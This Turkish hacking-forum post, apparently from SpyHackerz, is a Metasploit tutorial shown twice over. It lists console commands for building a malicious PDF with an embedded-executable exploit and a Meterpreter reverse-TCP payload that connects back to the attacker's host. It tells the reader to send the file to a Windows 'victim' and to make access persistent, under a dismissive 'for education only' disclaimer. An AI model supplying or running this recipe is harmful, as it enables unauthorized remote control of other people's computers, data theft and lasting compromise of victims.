Metasploit Nedir?
Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
Zararlı PDF dosyasını oluşturmak:
Terminali Açın ve bunları sırasıyla yazın:
1.msfconsole //Metasploit Açılır
2.use exploit/windows/fileformat/adobe_pdf_embedded_exe //Uygun Exploit Seçilir
3. set payload windows/meterpreter/reverse_tcp //Payloadımızı Ayarlarız
4. set LHOST 192.168.#.### //Buraya kendi inet adresinizi yazıyorsunuz,terminale ifconfig yazarak öğrenebilirsiniz wlan0 bölümünde
5. set LPORT 4444 //Portu Ayarlarız
6. set FILENAME spyhackerz.pdf // Dosya İsmi Ayarlanır
7. set INFILENAME home/wyx/Desktop/spyhackerz.pdf //INFILENAME yazısından sonra Daha Önce Oluşturduğunuz PDF dosyasının dizini yazılır
8.exploit
Şimdi "spyhackerz.pdf stored at /home/wyx/.msf4/local/spyhackerz.pdf" bunun gibi pdf dosyasının kaydedildiği dizini ekrana yazar.
Bu pdf dosyasını alıp karşıdaki windows kullancısına atarsanız ve kullanıcı bu dosyayı açarsa bir meterpreter oturumu açılır bunun sayesınden metasploitin desteklediği işlemleri kişinin bilgisayarında gerçekleştirebilirsiniz.
Kurbanın Sisteminde meterpreter oturumu açtıktan sonra Persistence.rb script kodunu kullanarak kalıcılık sağlayabilirsiniz.
Sadece eğitim amaçlıdır sorumluluk kabul etmem."her şeyden gogle paly sıtor sorumludur" yani bb
Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
Zararlı PDF dosyasını oluşturmak:
View hidden content is available for registered users!
Terminali Açın ve bunları sırasıyla yazın:
1.msfconsole //Metasploit Açılır
2.use exploit/windows/fileformat/adobe_pdf_embedded_exe //Uygun Exploit Seçilir
3. set payload windows/meterpreter/reverse_tcp //Payloadımızı Ayarlarız
4. set LHOST 192.168.#.### //Buraya kendi inet adresinizi yazıyorsunuz,terminale ifconfig yazarak öğrenebilirsiniz wlan0 bölümünde
5. set LPORT 4444 //Portu Ayarlarız
6. set FILENAME spyhackerz.pdf // Dosya İsmi Ayarlanır
7. set INFILENAME home/wyx/Desktop/spyhackerz.pdf //INFILENAME yazısından sonra Daha Önce Oluşturduğunuz PDF dosyasının dizini yazılır
8.exploit
Şimdi "spyhackerz.pdf stored at /home/wyx/.msf4/local/spyhackerz.pdf" bunun gibi pdf dosyasının kaydedildiği dizini ekrana yazar.
Bu pdf dosyasını alıp karşıdaki windows kullancısına atarsanız ve kullanıcı bu dosyayı açarsa bir meterpreter oturumu açılır bunun sayesınden metasploitin desteklediği işlemleri kişinin bilgisayarında gerçekleştirebilirsiniz.
Kurbanın Sisteminde meterpreter oturumu açtıktan sonra Persistence.rb script kodunu kullanarak kalıcılık sağlayabilirsiniz.
Sadece eğitim amaçlıdır sorumluluk kabul etmem."her şeyden gogle paly sıtor sorumludur" yani bb
Son düzenleme:
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
